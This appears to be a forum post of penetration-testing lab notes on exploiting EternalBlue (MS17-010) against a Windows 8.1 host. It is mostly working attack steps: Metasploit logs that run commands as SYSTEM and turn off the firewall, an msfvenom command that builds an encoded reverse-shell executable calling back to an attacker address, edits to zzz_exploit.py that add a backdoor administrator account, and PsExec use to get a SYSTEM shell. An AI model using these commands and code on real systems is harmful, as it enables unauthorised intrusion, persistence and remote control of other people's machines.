EternalBlue ms17-010 Firewall disble

I disabled firewall:
[*] 10.11.1.75:445 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND netsh advfirewall show currentprofile
COMMAND => netsh advfirewall show currentprofile
msf5 auxiliary(admin/smb/ms17_010_command) > run
[*] 10.11.1.75:445 - Target OS: Windows 8.1 Enterprise 9600[*] 10.11.1.75:445 - Built a write-what-where primitive...
[+] 10.11.1.75:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.11.1.75:445 - Service start timed out, OK if running a command or non-service executable...[*] 10.11.1.75:445 - checking if the file is unlocked[*] 10.11.1.75:445 - Getting the command output...[*] 10.11.1.75:445 - Executing cleanup...
[+] 10.11.1.75:445 - Cleanup was successful
[+] 10.11.1.75:445 - Command completed successfully![*] 10.11.1.75:445 - Output for "netsh advfirewall show currentprofile":


Public Profile Settings:
----------------------------------------------------------------------
State ON
Firewall Policy AllowInbound,BlockOutbound
LocalFirewallRules N/A (GPO-store only)
LocalConSecRules N/A (GPO-store only)
InboundUserNotification Disable
RemoteManagement Disable
UnicastResponseToMulticast Enable

Logging:
LogAllowedConnections Disable
LogDroppedConnections Disable
FileName %systemroot%\system32\LogFiles\Firewall\pfirewall. log
MaxFileSize 4096

Ok.


[*] 10.11.1.75:445 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND NetSh Advfirewall set allprofiles state off
COMMAND => NetSh Advfirewall set allprofiles state off
msf5 auxiliary(admin/smb/ms17_010_command) > run
[*] 10.11.1.75:445 - Target OS: Windows 8.1 Enterprise 9600[*] 10.11.1.75:445 - Built a write-what-where primitive...
[+] 10.11.1.75:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.11.1.75:445 - Service start timed out, OK if running a command or non-service executable...[*] 10.11.1.75:445 - checking if the file is unlocked[*] 10.11.1.75:445 - Getting the command output...[*] 10.11.1.75:445 - Executing cleanup...
[+] 10.11.1.75:445 - Cleanup was successful
[+] 10.11.1.75:445 - Command completed successfully![*] 10.11.1.75:445 - Output for "NetSh Advfirewall set allprofiles state off":

Ok.

And then and used the below command:
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp lhost=192.168.119.xxx lport=1234 -e x64/xor -i 5 -f exe -o expSMB.exe

Try starting netlogon service if the above does not work.


Disable firewall without using metasploit:

||||

First you need to use the exploit python script and modify it, if you want to shut down the firewall. Next you will want modify code around smb_pwn(conn, arch) function. You will see some comments that need to be uncommented and modified. This is where you will inject netsh command and turn off the firewall. After injecting this command it will turn off the firewall and you will be able to get reverse shell.

Command to Inject to Turn off Firewall: netsh advfirewall set allprofiles state off

Other method is create a user and create privilege to remote desktop and administrator group. Then you can login to remote desktop. Firewall is the easiest method to get to System user.


https://www.exploit-db.com/exploits/42315



//
So I scanned the machine-> instantly knew eternalblue

grabbed a copy of zzz_exploit.py modified the smb_pwn function to add a user in the administrator group

PHP Code:
    service_exec(conn, r'cmd /c net user bill pass /add')
    service_exec(conn, r'cmd /c net localgroup administrators bill /add') 
random.png

Then RDP'd in and then just ran the commandprompt as Administrator

Disabled firewall and enabled smb

Downloaded psExec and spawned a systemshell PsExec -i -s cmd.exe.

10 min